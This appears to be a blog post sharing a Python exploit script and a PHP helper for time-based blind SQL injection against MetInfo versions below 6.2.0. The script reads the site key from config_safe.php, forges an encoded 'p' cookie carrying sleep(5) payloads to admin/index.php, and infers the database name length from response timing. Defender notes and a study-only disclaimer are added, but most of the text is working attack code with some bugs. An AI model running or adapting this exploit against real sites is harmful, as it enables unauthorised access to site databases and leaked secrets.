metinfo小於v6.2.0版本SQL盲註利用腳本
阿新 • • 發佈:2019-04-19
#coding=utf-8
"""Time-based blind SQL injection probe for MetInfo versions below v6.2.0 (per the post title).

Flow, as written: getKey -> databaseLen -> queryKey -> getTestUrl -> getData.
The script reads the site key out of /config/config_safe.php, asks a locally
hosted copy of the application's authcode() encoder (the PHP helper shown
below the script) to encode each SQL payload with that key, sends the result
in the ``p`` cookie to admin/index.php, and treats a response slower than 4 s
as the sleep(5) condition having fired.

Defender notes (everything here is visible in the requests the script makes):
- A GET for /config/config_safe.php from an anonymous client is by itself a
  strong indicator; the key it exposes is what makes the ``p`` cookie forgeable.
- The probe is a burst of 20 near-identical GETs to
  admin/index.php?n=user&m=web&c=register&a=doemailvild that differ only in
  the ``p`` cookie, with the matching candidate taking about 5 s longer.
- The title scopes the issue to versions below 6.2.0, so upgrading is the
  fix; a key that has been readable this way should be treated as exposed.
"""
import requests
import re
import sys
import time


# Fetch the site key from config_safe.php and kick off the length probe.
def getKey(url,headers,local_url):
    """Read the key out of ``<url>/config/config_safe.php`` and start ``databaseLen``.

    The key is whatever sits between ``<?php/*`` and ``*/?>`` in the response
    body (first regex match). ``headers`` is passed positionally here, i.e. as
    requests' second positional argument rather than as ``headers=``.

    Any exception (connection error, no regex match, a failure deeper in the
    chain) is swallowed by the bare ``except`` and reported as "secure", so the
    message does not distinguish a patched site from a network problem.
    """
    try:
        url_key = url + "/config/config_safe.php"
        rsp = requests.get(url_key,headers)
        # Key is embedded in a PHP block comment: <?php/* ... */?>
        p = re.compile(r‘<\?php\/\*(.*)\*\/\?>‘)
        p1 = p.findall(rsp.text)
        key = p1[0]
        databaseLen(key,headers,local_url,url)
    except:
        sys.exit("The website is secure!!")


# Probe the length of the current database name, one candidate at a time.
def databaseLen(key,headers,local_url,url):
    """Try lengths 1..20 for ``length(database())`` via a sleep(5) condition.

    Each candidate becomes a URL-encoded payload (the literal below decodes
    to ``1' or if((select length(database())=<n>),sleep(5),1)#``) that is
    handed to ``queryKey`` for encoding and delivery. Nothing is returned and
    the loop does not stop on a hit; the only signal is the "ok" that
    ``getData`` prints. ``str`` is used as the loop variable and shadows the
    builtin.
    """
    for str in range(1,21):
        str = ‘%d‘%str
        payload = "1%27%20or%20if((select%20length(database())="+ str +"),sleep(5),1)%23"
        queryKey(key,headers,payload,local_url,url)


# Have the local authcode() helper encode one payload with the leaked key.
def queryKey(key,headers,str,local_url,url):
    """POST ``key`` and ``str`` to ``local_url`` and forward the encoded result.

    The body is a hand-built form string, so ``key``/``str`` go out as-is
    (no encoding beyond what ``str`` already carries). ``rsp.text`` — the
    helper's urlencoded authcode() output — is passed to ``getTestUrl`` as
    the value for the ``p`` cookie. The commented lines below are a leftover
    manual un-encoding step.
    """
    payload = "key="+key+"&str="+str
    rsp = requests.post(local_url,headers = headers,data = payload)
    # str = rsp.url
    # data = str.replace(‘+‘,‘%20‘).replace(‘%28‘,‘(‘).replace(‘%29‘,‘)‘).replace(‘%3D‘,‘=‘).replace(‘%2C‘,‘,‘)
    # print(data)
    getTestUrl(url,rsp.text,headers)


# Build the request that carries the encoded payload to the register handler.
def getTestUrl(url,payload,headers):
    """Send ``payload`` in cookie ``p`` to admin/index.php, then time it via ``getData``.

    The query string is fixed to n=user&m=web&c=register&a=doemailvild; the
    PHPSESSID / Phpstorm cookie values are static literals (presumably copied
    from one session) and only ``p`` varies between calls. The resulting URL
    (``rsp.url``) is fetched a second time by ``getData``, which is where the
    timing is measured.
    """
    params = {‘n‘:‘user‘,‘m‘:‘web‘,‘c‘:‘register‘,‘a‘:‘doemailvild‘}
    cookies = {‘Phpstorm-cd979afe‘:‘49f537dc-5078-4407-a224-9fbd39b31aa6‘,‘PHPSESSID‘:‘bba89344cb69a733ca0e20c46d7338b4‘,‘p‘:payload}
    test_url = url + "/admin/index.php"
    rsp = requests.get(test_url,params = params,cookie = cookies)
    str = rsp.url
    getData(str,headers)


# Measure one request; a response slower than 4 s is taken as sleep(5) having fired.
def getData(url,headers):
    """GET ``url`` and print "ok" if the round trip took more than 4 seconds.

    The 4 s threshold sits just under the sleep(5) in the payload; anything
    slower is attributed to the injected condition being true. Nothing is
    returned, so callers learn the outcome only from stdout. ``headers`` is
    again passed positionally.
    """
    startTime = time.time();
    rsp = requests.get(url,headers)
    if time.time() - startTime > 4:
        print("ok")
    else:
        pass


if __name__ == ‘__main__‘:
    # Browser-like headers; Content-Type matches the hand-built form body queryKey posts.
    headers = {
        "Content-Type":"application/x-www-form-urlencoded",
        "User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0",
        "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language":"en-US,en;q=0.5"
    }
    url = input("please input URL:")
    # NOTE: ``"http://" or ...`` is always truthy (non-empty string), so this
    # scheme check never rejects anything and the else branch is unreachable.
    if "http://" or "https://" in url:
        # Address of the locally hosted authcode() encoder (the PHP helper below).
        local_url = input("請輸入本地搭建的encode函數地址:")
        getKey(url,headers,local_url)
    else:
        print("please input the correct url!!")
本地搭建的encode函數源碼:
<?php
/**
 * authcode() — a reversible token encoder (presumably the same routine the target
 * application uses), hosted locally so the script above can produce a `p` cookie
 * for arbitrary plaintext once it holds the site key.
 *
 * Key schedule (everything derives from $key alone): $keya / $keyb are md5 of the
 * two halves of md5($key); $keyc is a 4-char prefix (read from the token on decode,
 * derived from microtime() on encode); $cryptkey = $keya . md5($keya . $keyc) seeds a
 * 256-entry state box that is stepped once per input byte and XORed against it
 * (RC4-style keystream). Encode output is $keyc . base64(ciphertext) with '=' padding
 * stripped; decode checks a 10-char expiry prefix and a 16-char md5 tag over
 * (body . $keyb) before returning the body.
 *
 * Defender note: because both the keystream and the integrity tag derive from $key,
 * a token is only as trustworthy as the secrecy of that key — which is exactly what
 * the config_safe.php read in the script above defeats.
 *
 * @param string $string    plaintext (encode) or token (decode)
 * @param string $operation 'DECODE' to verify and decrypt; any other value encodes
 * @param string $key       secret; falls back to UC_KEY (not defined in this snippet) when empty
 * @param int    $expiry    lifetime in seconds; 0 writes a "0000000000" header, i.e. never expires
 * @return string decoded body, '' when the decode check fails, or the encoded token
 */
function authcode($string, $operation = ‘DECODE‘, $key = ‘‘, $expiry = 0){
    $ckey_length = 4;
    $key = md5($key ? $key : UC_KEY);
    // $keya feeds the keystream, $keyb feeds the integrity tag.
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    // Per-token 4-char salt: first 4 chars of the token on decode, time-derived on encode.
    $keyc = $ckey_length ? ($operation == ‘DECODE‘ ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ‘‘;
    $cryptkey = $keya.md5($keya.$keyc);
    $key_length = strlen($cryptkey);
    // Decode: strip the salt and un-base64. Encode: prepend expiry (10 digits) + md5 tag (16 chars).
    $string = $operation == ‘DECODE‘ ? base64_decode(substr($string, $ckey_length)) : sprintf(‘%010d‘, $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
    $string_length = strlen($string);
    $result = ‘‘;
    $box = range(0, 255);
    $rndkey = array();
    // Expand $cryptkey cyclically to 256 bytes.
    for($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
    // Key-scheduling pass: permute the box under $rndkey.
    for($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }
    // Keystream pass: one box step per byte, XORed into the output (symmetric, so the same loop decodes).
    for($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }
    if($operation == ‘DECODE‘) {
        // Accept when unexpired (header "0" or still in the future) AND the md5 tag over body.$keyb matches.
        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
            return substr($result, 26);
        } else {
            return ‘‘;
        }
    }else{
        // Token = salt + base64(ciphertext) without '=' padding.
        return $keyc.str_replace(‘=‘, ‘‘, base64_encode($result));
    }
}
// Entry point for the script's queryKey(): take str/key from the POST body and print the
// urlencoded token. 'ENCOUDE' is a typo but has no effect here — anything other than
// 'DECODE' takes the encode path. Expiry 0 means the produced token never expires.
print_r(urlencode(authcode($_POST[‘str‘],‘ENCOUDE‘,$_POST[‘key‘],0)));
僅供學習交流使用,請勿惡意攻擊他人網站,如非法利用,與本人無關。